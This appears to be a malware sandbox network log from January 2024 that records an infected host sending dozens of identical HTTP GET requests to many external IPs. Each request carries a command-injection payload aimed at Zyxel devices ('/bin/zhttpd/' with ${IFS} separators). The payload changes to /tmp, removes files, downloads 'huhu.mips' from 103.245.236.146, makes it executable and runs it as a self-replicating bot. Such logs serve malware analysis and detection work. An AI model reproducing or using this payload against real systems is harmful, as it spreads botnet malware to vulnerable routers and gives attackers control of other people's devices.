                                                Jan 29, 2024 07:07:53.451049089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5638192.168.2.233802889.216.11.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451061010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5639192.168.2.235615237.142.211.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451103926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5640192.168.2.2336782104.8.149.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451137066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5641192.168.2.2352836168.67.204.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451195002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5642192.168.2.2348960147.153.99.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451219082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5643192.168.2.2355408131.14.23.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451267004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5644192.168.2.2338400125.131.133.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451294899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5645192.168.2.234167870.162.43.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451358080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5646192.168.2.2357824160.78.183.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451380968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5647192.168.2.2341306207.248.177.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451417923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5648192.168.2.2351698168.14.49.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451447010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5649192.168.2.2350920190.35.57.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451488018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5650192.168.2.2349370129.196.82.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451519012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5651192.168.2.234314641.193.107.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451560974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5652192.168.2.235015490.146.237.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451596022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5653192.168.2.235222653.157.124.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451649904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5654192.168.2.2354898219.102.32.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451699972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5655192.168.2.235012094.54.68.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451710939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5656192.168.2.2336766142.255.114.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451766968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5657192.168.2.236048046.172.73.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451771021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5658192.168.2.2348678219.207.187.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451826096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5659192.168.2.2356704161.35.8.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451890945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5660192.168.2.2346214165.53.107.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451905966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5661192.168.2.234803012.35.233.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451953888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5662192.168.2.235747048.195.0.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.451982021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5663192.168.2.234696232.8.170.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452009916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5664192.168.2.236066025.22.29.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452049017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5665192.168.2.2349660117.21.122.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452090979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5666192.168.2.235764289.130.217.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452119112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5667192.168.2.2335610149.195.55.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452183008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5668192.168.2.235994297.248.95.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452204943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5669192.168.2.2349330139.67.112.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452243090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5670192.168.2.234388093.163.209.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452281952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5671192.168.2.2338998116.132.101.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452325106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5672192.168.2.2356760136.231.230.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452358961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5673192.168.2.235627286.233.31.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452383995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5674192.168.2.2352460196.1.226.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452430964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5675192.168.2.235488418.61.202.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452466965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5676192.168.2.2355028184.248.248.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452493906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5677192.168.2.2356710197.198.215.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452544928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5678192.168.2.234418066.239.20.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452581882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5679192.168.2.2345838166.71.149.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452616930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5680192.168.2.2337110129.80.66.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452663898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5681192.168.2.2344318204.229.68.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452702999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5682192.168.2.2341380218.49.3.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452737093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5683192.168.2.2358480152.8.103.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452785969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5684192.168.2.2343514137.162.152.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452821970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5685192.168.2.2333988222.5.127.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452850103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5686192.168.2.234899687.188.132.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452892065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5687192.168.2.2346492194.245.240.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452936888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5688192.168.2.2349392102.239.139.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.452979088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5689192.168.2.233720673.92.116.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453026056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5690192.168.2.233577669.23.181.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453134060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5691192.168.2.2345918179.96.202.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453161955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5692192.168.2.2356030171.191.29.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453188896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5693192.168.2.23449508.96.143.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453229904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5694192.168.2.235678441.168.225.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453253984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5695192.168.2.2346568192.234.215.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453315973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5696192.168.2.234726677.220.45.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453325033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5697192.168.2.2334050196.17.128.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453366041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5698192.168.2.234772042.134.34.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453417063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5699192.168.2.235536297.192.142.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453445911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5700192.168.2.233284623.176.85.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453496933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5701192.168.2.2336614157.209.119.30443
                                                TimestampBytes transferredDirectionData
